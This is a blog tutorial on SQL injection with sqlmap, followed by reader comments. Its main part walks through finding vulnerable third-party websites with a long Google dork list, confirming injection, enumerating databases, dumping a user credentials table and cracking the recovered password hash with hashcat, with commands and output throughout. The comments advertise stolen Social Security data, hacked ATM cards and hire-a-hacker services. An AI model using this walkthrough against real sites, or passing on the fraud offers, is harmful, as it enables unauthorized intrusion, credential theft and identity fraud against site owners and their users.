HI friends
if you were buzzed about how to simulate sql injection or attack/test a website using sql injection this article is for u
There were several tools to perform sql injection ,but inorder to automate there were tools like : sqlmap,bbqsql etc
SQLMap Tutorial :
For your reference of sqlmap cheatsheet available over here
The simple command to test using sqlmap was as follows :
Options used to specify HTTP communication behaviors:
Options used to specify audit behaviors:
Options used to specify scan information's' saving behaviors:
Extract from SQLMap documentation about SQL injection techniques identified by B/E/U/S/T (http://sqlmap.sourceforge.net/doc/README.html#toc1.3):
The script use an external CSS file named "style.css" (located into the same location than the report) to format report.
A CSS sample is available below:
if you were looking for practical example this would be a good one :
So here goes:
Let’s say you searched using this string
So now your URL will become like this:
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Run the following command on your vulnerable website with.
See screenshot below.
This commands reveals quite a few interesting info:
and of course we want to check whats inside
This returns 5 entries from target table
AHA! This is exactly what we are looking for … target table
Guess what, we now have the username from the database:
Almost there, we now only need the password to for this user.. Next shows just that..
TADA!! We have password.
But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.
I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.
I will cover it in short here but you should really learn how to use hashcat.
Excellent. So this is DES(Unix) hash.
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123.
Sweet, we now even have the password for this user.
Note : If you were using kali linux 2.0 then cudahashcat would be "hashcat"
source : darkmeops,owsap,stackoverflow
hope it helps
if you were buzzed about how to simulate sql injection or attack/test a website using sql injection this article is for u
There were several tools to perform sql injection ,but inorder to automate there were tools like : sqlmap,bbqsql etc
SQLMap Tutorial :
For your reference of sqlmap cheatsheet available over here
The simple command to test using sqlmap was as follows :
python sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2 --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt
if you were using kali linux(All in single line) paste it to terminal :
From owsap the explanation would be as follows :
sqlmap -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2 --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt
Options used to specify HTTP communication behaviors:
- -v: Set the verbosity level of output messages (Option details section).
- --url: Run sqlmap against a single target URL (Option details section).
- --user-agent: Providing custom User-Agent (Option details section).
- --delay: Number of seconds to hold between each HTTP(S) request (Option details section).
- --timeout: Number of seconds to wait before considering the HTTP(S) request timed out (Option details section).
- --retries: Maximum number of retries when the HTTP(S) connection timeouts (Option details section).
- --keep-alive: Use persistent HTTP(s) connections (Option details section).
- --threads: Maximum number of concurrent HTTP(S) requests that sqlmap is allowed to do (Option details section).
- --eta: Calculate and show in real time the estimated time of arrival to retrieve each query output. This is shown when the technique used to retrieve the output is any of the blind SQL injection type (Option details section).
- --batch: This will leave sqlmap to go with a default behaviour whenever user's input would be required (Option details section).
Options used to specify audit behaviors:
- --dbms: Force back-end DBMS to this value (Option details section).
- --os: Force back-end DBMS operating system to this value (Option details section).
- --level: Level of tests to perform from 1 to 5, default is 1 (Option details section).
- --risk: Specifies the risk of tests to perform from 1 to 3, default is 1 (Option details section).
- --banner: Try to retrieve the database management systems product banner (Option details section).
- --is-dba: Detect if the current database management system session user is a database administrator (Option details section).
- --dbs: Try to enumerate the list of databases (Option details section).
- --tables: Try to enumerate DBMS database tables (Option details section).
- --technique: SQL injection techniques to test for, default is BEUST (Option details section),
- B: Boolean-based blind SQL injection
- E: Error-based SQL injection
- U: UNION query SQL injection
- S: Stacked queries SQL injection
- T: Time-based blind SQL injection
Options used to specify scan information's' saving behaviors:
- -s: Save and resume all data retrieved on a session file (Option details section).
- --flush-session: Flush the content of file specified by '-s' in order to avoid the caching mechanisms implemented by default in sqlmap (Option details section).
- -t: Log all HTTP traffic into a textual file (Option details section).
- --fresh-queries: Ignores query results stored in session file (Option details section).
Extract from SQLMap documentation about SQL injection techniques identified by B/E/U/S/T (http://sqlmap.sourceforge.net/doc/README.html#toc1.3):
[B]oolean-based blind SQL injection, also known as inferential SQL injection: sqlmap replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output. For each HTTP response, by making a comparison between the HTTP response headers/body with the original request, the tool inference the output of the injected statement character by character. Alternatively, the user can provide a string or regular expression to match on True pages. The bisection algorithm implemented in sqlmap to perform this technique is able to fetch each character of the output with a maximum of seven HTTP requests. Where the output is not within the clear-text plain charset, sqlmap will adapt the algorithm with bigger ranges to detect the output. [E]rror-based SQL injection: sqlmap replaces or append to the affected parameter a database-specific syntatically wrong statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the statement output within. This technique works when the web application has been configured to disclose back-end database management system error messages only. [U]NION query SQL injection, also known as inband SQL injection: sqlmap appends to the affected parameter a syntatically valid SQL statement string starting with a UNION ALL SELECT. This techique works when the web application page passes the output of the SELECT statement within a for cycle, or similar, so that each line of the query output is printed on the page content. sqlmap is also able to exploit partial (single entry) UNION query SQL injection vulnerabilities which occur when the output of the statement is not cycled in a for construct whereas only the first entry of the query output is displayed. [S]tacked queries SQL injection, also known as multiple statements SQL injection: sqlmap tests if the web application supports stacked queries then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be executed. This technique is useful to run SQL statements other than SELECT like, for instance, data definition or data manipulation statements possibly leading to file system read and write access and operating system command execution depending on the underlying back-end database management system and the session user privileges. [T]ime-based blind SQL injection, also known as full blind SQL injection: sqlmap replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds. For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character. Like for boolean-based technique, the bisection algorithm is applied.
Report
The python script below can be used to generate a HTML report from the stdout of the command line (redirected to "/tmp/scan_out.txt" in the SQLMap command line):########################################### # Script to generate a HTML report from a # SQLMap stdout output # # Author : Dominique Righetto # dominique.righetto@owasp.org # Date : March 2012 ########################################### import sys #I/O paths, take SQLMap STDOUT file from script parameter stdout_file_path = sys.argv[1] report_file_path = stdout_file_path + ".html" #Open STDOUT file in read mode file_handle_read = open(stdout_file_path,"r") #Open REPORT file in write mode file_handle_write = open(report_file_path,"w") #Initialize HTML report stream file_handle_write.write("<html xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"en\" xml:lang=\"en\">") file_handle_write.write("<head><link rel=\"StyleSheet\" href=\"style.css\" type=\"text/css\" media=\"screen\" /><title>SQLMap HTML Report</title></head>") file_handle_write.write("<body><table id=\"myStyle\">") file_handle_write.write("<thead><tr><th scope=\"col\">Test datetime</th><th scope=\"col\">Test description</th></tr></thead>") file_handle_write.write("<tbody>") #Flag to know is global audit is OK cannot_find_injectable_parameter = False #Read STDOUT file line by line for line in file_handle_read: if (line.strip().startswith("[")) and (line.find("[*]") == -1): #Check for special message indicating audit global status if(line.lower().find("all parameters are not injectable") > -1): cannot_find_injectable_parameter = True #Report generation line_part = line.strip().split(" ") if (line_part[2].lower() == "testing"): #Extract useful informations execution_datatime = line_part[0] execution_trace = "" count = 2 while(count < len(line_part)): execution_trace = execution_trace + " " + line_part[count] count = count + 1 #Write report HTML line file_handle_write.write("<tr><td>" + line_part[0] + "</td><td>" + execution_trace + "</td></tr>") file_handle_write.write("</tbody></table>") #Write global audit stauts line if(cannot_find_injectable_parameter): file_handle_write.write("<h1 class=\"success\">SQLMap cannot find injectable parameters !</h1>") else: file_handle_write.write("<h1 class=\"fail\">SQLMap can find injectable parameters !</h1>") #Finalize report HTML stream file_handle_write.write("</body></html>") #Close I/O stream file_handle_write.close() file_handle_read.close() #Print some informations print "Report generated to " + report_file_pathTo generate the report use the command line below:
python SQMReportGenerator.py /tmp/scan_out.txtThe report will be generated into the same location than the input file using source file name and adding ".html" extension as report name.
The script use an external CSS file named "style.css" (located into the same location than the report) to format report.
A CSS sample is available below:
body { line-height: 1.6em; } .success { font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif; text-align: center; color: green; } .fail { font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif; text-align: center; color: red; } #myStyle { font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif; font-size: 12px; margin: 45px; width: 75%; text-align: left; border-collapse: collapse; border: 1px solid #6cf; } #myStyle th { padding: 20px; font-weight: normal; font-size: 13px; color: #039; text-transform: uppercase; text-align: center; border-right: 1px solid #0865c2; border-top: 1px solid #0865c2; border-left: 1px solid #0865c2; border-bottom: 1px solid #fff; } #myStyle td { padding: 10px 20px; color: #669; border-right: 1px dashed #6cf; }Example of generated report:
Remark about scan scheduling
The scan take a while then it's recommended to schedule is execution:- During the night for a daily audit case.
- During the week-end for a weekly audit case.
if you were looking for practical example this would be a good one :
What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.Features
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
- Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
So here goes:
Contents [hide]
- What is SQLMAP
- Step 1: Find a Vulnerable Website
- Step 2: List DBMS databases using SQLMAP SQL Injection
- Step 3: List tables of target database using SQLMAP SQL Injection
- Step 4: List columns on target table of selected database using SQLMAP SQL Injection
- Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
- Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
- Step 7: Cracking password
- Conclusion
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.Google Dork string Column 1 | Google Dork string Column 2 | Google Dork string Column 3 |
---|---|---|
inurl:item_id= | inurl:review.php?id= | inurl:hosting_info.php?id= |
inurl:newsid= | inurl:iniziativa.php?in= | inurl:gallery.php?id= |
inurl:trainers.php?id= | inurl:curriculum.php?id= | inurl:rub.php?idr= |
inurl:news-full.php?id= | inurl:labels.php?id= | inurl:view_faq.php?id= |
inurl:news_display.php?getid= | inurl:story.php?id= | inurl:artikelinfo.php?id= |
inurl:index2.php?option= | inurl:look.php?ID= | inurl:detail.php?ID= |
inurl:readnews.php?id= | inurl:newsone.php?id= | inurl:index.php?= |
inurl:top10.php?cat= | inurl:aboutbook.php?id= | inurl:profile_view.php?id= |
inurl:newsone.php?id= | inurl:material.php?id= | inurl:category.php?id= |
inurl:event.php?id= | inurl:opinions.php?id= | inurl:publications.php?id= |
inurl:product-item.php?id= | inurl:announce.php?id= | inurl:fellows.php?id= |
inurl:sql.php?id= | inurl:rub.php?idr= | inurl:downloads_info.php?id= |
inurl:index.php?catid= | inurl:galeri_info.php?l= | inurl:prod_info.php?id= |
inurl:news.php?catid= | inurl:tekst.php?idt= | inurl:shop.php?do=part&id= |
inurl:index.php?id= | inurl:newscat.php?id= | inurl:productinfo.php?id= |
inurl:news.php?id= | inurl:newsticker_info.php?idn= | inurl:collectionitem.php?id= |
inurl:index.php?id= | inurl:rubrika.php?idr= | inurl:band_info.php?id= |
inurl:trainers.php?id= | inurl:rubp.php?idr= | inurl:product.php?id= |
inurl:buy.php?category= | inurl:offer.php?idf= | inurl:releases.php?id= |
inurl:article.php?ID= | inurl:art.php?idm= | inurl:ray.php?id= |
inurl:play_old.php?id= | inurl:title.php?id= | inurl:produit.php?id= |
inurl:declaration_more.php?decl_id= | inurl:news_view.php?id= | inurl:pop.php?id= |
inurl:pageid= | inurl:select_biblio.php?id= | inurl:shopping.php?id= |
inurl:games.php?id= | inurl:humor.php?id= | inurl:productdetail.php?id= |
inurl:page.php?file= | inurl:aboutbook.php?id= | inurl:post.php?id= |
inurl:newsDetail.php?id= | inurl:ogl_inet.php?ogl_id= | inurl:viewshowdetail.php?id= |
inurl:gallery.php?id= | inurl:fiche_spectacle.php?id= | inurl:clubpage.php?id= |
inurl:article.php?id= | inurl:communique_detail.php?id= | inurl:memberInfo.php?id= |
inurl:show.php?id= | inurl:sem.php3?id= | inurl:section.php?id= |
inurl:staff_id= | inurl:kategorie.php4?id= | inurl:theme.php?id= |
inurl:newsitem.php?num= | inurl:news.php?id= | inurl:page.php?id= |
inurl:readnews.php?id= | inurl:index.php?id= | inurl:shredder-categories.php?id= |
inurl:top10.php?cat= | inurl:faq2.php?id= | inurl:tradeCategory.php?id= |
inurl:historialeer.php?num= | inurl:show_an.php?id= | inurl:product_ranges_view.php?ID= |
inurl:reagir.php?num= | inurl:preview.php?id= | inurl:shop_category.php?id= |
inurl:Stray-Questions-View.php?num= | inurl:loadpsb.php?id= | inurl:transcript.php?id= |
inurl:forum_bds.php?num= | inurl:opinions.php?id= | inurl:channel_id= |
inurl:game.php?id= | inurl:spr.php?id= | inurl:aboutbook.php?id= |
inurl:view_product.php?id= | inurl:pages.php?id= | inurl:preview.php?id= |
inurl:newsone.php?id= | inurl:announce.php?id= | inurl:loadpsb.php?id= |
inurl:sw_comment.php?id= | inurl:clanek.php4?id= | inurl:pages.php?id= |
inurl:news.php?id= | inurl:participant.php?id= | |
inurl:avd_start.php?avd= | inurl:download.php?id= | |
inurl:event.php?id= | inurl:main.php?id= | |
inurl:product-item.php?id= | inurl:review.php?id= | |
inurl:sql.php?id= | inurl:chappies.php?id= | |
inurl:material.php?id= | inurl:read.php?id= | |
inurl:clanek.php4?id= | inurl:prod_detail.php?id= | |
inurl:announce.php?id= | inurl:viewphoto.php?id= | |
inurl:chappies.php?id= | inurl:article.php?id= | |
inurl:read.php?id= | inurl:person.php?id= | |
inurl:viewapp.php?id= | inurl:productinfo.php?id= | |
inurl:viewphoto.php?id= | inurl:showimg.php?id= | |
inurl:rub.php?idr= | inurl:view.php?id= | |
inurl:galeri_info.php?l= | inurl:website.php?id= |
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.Let’s say you searched using this string
inurl:item_id=
and one of the search result shows a website like this:http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15Just add a single quotation mark
'
at the end of the URL. (Just to ensure, "
is a double quotation mark and '
is a single quotation mark).So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages
Microsoft SQL Server
Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.
MySQL Errors
Warning:
mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error:
You have an error in your SQL syntax: check the manual that corresponds
to your MySQL server version for the right syntax to use near ‘’’ at
line 12
Oracle Errors
java.sql.SQLException:
ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near “‘’’”
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbsIn here:
sqlmap
= Name of sqlmap binary file-u
= Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)--dbs
= Enumerate DBMS databasesSee screenshot below.
This commands reveals quite a few interesting info:
web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved: information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'So, we now have two database that we can look into.
information_schema
is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite
database.Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite
database got and what are their names. To find out that information, use the following command:sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tablesSweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture [10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info
and of course we want to check whats inside
user_info
table using SQLMAP SQL Injection as that table probably contains username and passwords.Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target table user_info
of sqldummywebsite
database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table
user_info
of sqldummywebsite
database.[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries [10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] [INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) [10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target table
user_login
and user_password
.Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there, we now only need the password to for this user.. Next shows just that..
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18] [INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+
But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.
I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.
I will cover it in short here but you should really learn how to use hashcat.
Step 7: Cracking password
So the hashed password is 24iYBc17xK0e.
. How do you know what type of hash is that?Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:hash-identifier
Excellent. So this is DES(Unix) hash.
Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value
24iYBc17xK0e.
in DES.hash
file. Following is the command I am running:cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
Note : If you were using kali linux 2.0 then cudahashcat would be "hashcat"
source : darkmeops,owsap,stackoverflow
hope it helps
very nice post thanks a lot
ReplyDeleteDownload shdow fight 3 unlimited money and gems apk free
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
Delete**Price for One SSN lead 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
I am here to testify about how i use Scott Hacking Company blank ATM card to make money and also have my own business today. Go get your blank ATM card today and be among the lucky ones. This PROGRAMMED blank ATM card is capable of hacking into any ATM machine, anywhere in the world. It has really changed my life for good and now i can say am rich and can never be poor again. You can withdraw the maximum of $5,500 daily i can proudly say my business is doing fine and i have up to 30,000 000 (10 millions dollars in our account) Is not illegal, there is no risk of being caught, because it has been programmed in such a way that it is not traceable, it also has a technique that makes it impossible for the CCTV to detect you..For details and cost on how to get yours today, Just send an Email (: globalatmcardhackingservices@gmail.com ) or his whatsap contact (+1 301-887-5071)
DeleteI love this arguments , will this still works this 2018?
ReplyDeletereally nice information
ReplyDeletecurrent affairs
Nice post....
ReplyDeleteWe are providing the best master data services around the world....visit our site for more information....
Master Data Management
data management services
master data management in sap
data cleansing tools
Master Data Governance
Data Cleansing Services
data classification tools
Master Data Management Solutions
ReplyDeleteEmail:CYBERFILES.HACKER@GMAIL.COM
REACH US THROUGH THE EMAIL ABOVE, FOR SPYING AND HACKING PHONES, COMPUTER, EMAIL, FACEBOOK, WHATSAPP AND OTHER SOCIAL NETWORK ACCOUNTS, CANCEL PHONE TAPPING, CHANGE YOUR GRADES OR BOOST YOUR CREDIT SCORE.
OUR SERVICES ARE THE BEST ON THE MARKET AND 100% SECURE AND GUARANTEED.
GREAT NEWS, YOU'VE JUST FOUND A LEGIT HACKER,
ReplyDeleteHAVE YOU LOST YOUR HARD EARNED FUNDS TO THE BINARY OPTION SCAM?
Right now, millions of hackers, spammers and scammers are hard at work. They're after your Social Security number, bank account information and social media accounts. With any of these, they can steal your money or trick your friends into giving up theirs.
Between semi-amateurs with automated systems and serious hackers who are masters of technology and trickery, how can you possibly hope to stay safe?
The best way is to know how hackers do what they do. Once you know that, you can counter their malicious acts.
Welcome to the ALEXGHACKLORD@GMAIL .com
In the world of hacking we are the best when it comes to client satisfaction. Stop being scammed by fake hackers. Profound Hacks Tech is an experienced online Private Investigator/Ethical Hacker providing investigative solutions and related services to individuals. You might be curious that what hacking group services can provide? .. If you hire a hacker, you always have worried of losing your money. We won't keep a cent if we can't do your job. 100% refund if job is not completed. Contact - ALEXGHACKLORD@GMAIL. com We render
+University Grades Hack,
+Bank Account Hacks,
+Control devices remotely hack,
+Facebook Hacking Tricks,
+Gmail, AOL, Yahoomail, inbox, mobile phone (call and text message Hacking are available)
+Database Hacking,
+PC Computer Tricks
+Bank transfer, Western Union, Money Gram, Credit Card transfer
+Wiping of Credit,
+VPN Software,
+ATM Hack
email us now ::ALEXGHACKLORD@GMAIL. COM
+Are you suspecting your partner of cheating or having an extramarital affair?
As that could result in unnecessary confusion in your relationship or marriage. it's always advisable to consult a professional hacker to help you get concrete evidence by discreetly getting access to their phone or computers.
ALEXGHACKLORD can also work on that.
NOTE
Nice post.
ReplyDeleteforum.cs-cart.com
My wife was putting up some
ReplyDeleteattitude and acting
strange,and we have been
married for eight years,I
explained my problems to my
friend and he recommended
brillianthackers800@gmail.com
,I sent him a mail explaining
my situation to him and he
helped me hack into her
phone,Walt sent me a WhatsApp
conversation between my wife
and her concubine which she
told him everything about me
and our marriage and he also
recorded a call conversation
between she and her concubine
talking about how they were
going to kill me and take my
money and properties,I took
this to court and I won the
case,they were locked up in
prison all thanks to Walt who
saved my life through his
hacking experience,every
dollar I spent on this job
was worth it,message him and
he will help you with your
problems.
+1(224)2140835(WHATSAPP)
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**Price for One SSN lead 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
ReplyDeleteINSTEAD OF GETTING A LOAN,, I GOT SOMETHING NEW
Get $10,050 USD every week, for six months!
See how it works
Do you know you can hack into any ATM machine with a hacked ATM card??
Make up you mind before applying, straight deal...
Order for a blank ATM card now and get millions within a week!: contact us
via email address:: besthackersworld58@gmail.com or whats-app +1(323)-723-2568
We have specially programmed ATM cards that can be use to hack ATM
machines, the ATM cards can be used to withdraw at the ATM or swipe, at
stores and POS. We sell this cards to all our customers and interested
buyers worldwide, the card has a daily withdrawal limit of $2,500 on ATM
and up to $50,000 spending limit in stores depending on the kind of card
you order for:: and also if you are in need of any other cyber hack
services, we are here for you anytime any day.
Here is our price lists for the ATM CARDS:
Cards that withdraw $5,500 per day costs $200 USD
Cards that withdraw $10,000 per day costs $850 USD
Cards that withdraw $35,000 per day costs $2,200 USD
Cards that withdraw $50,000 per day costs $5,500 USD
Cards that withdraw $100,000 per day costs $8,500 USD
make up your mind before applying, straight deal!!!
The price include shipping fees and charges, order now: contact us via
email address::besthackersworld58@gmail.com or whats-app +1(323)-723-2568
CONTACT 24/7
ReplyDeleteTelegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
Selling SSN+Dob Leads/Fullz/Pros, along with Driving License/ID Number For Tax return & W-2 Form filling, etc.
**PRICE**
>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)
**DETAILS IN LEADs/FULLZ/PROS**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
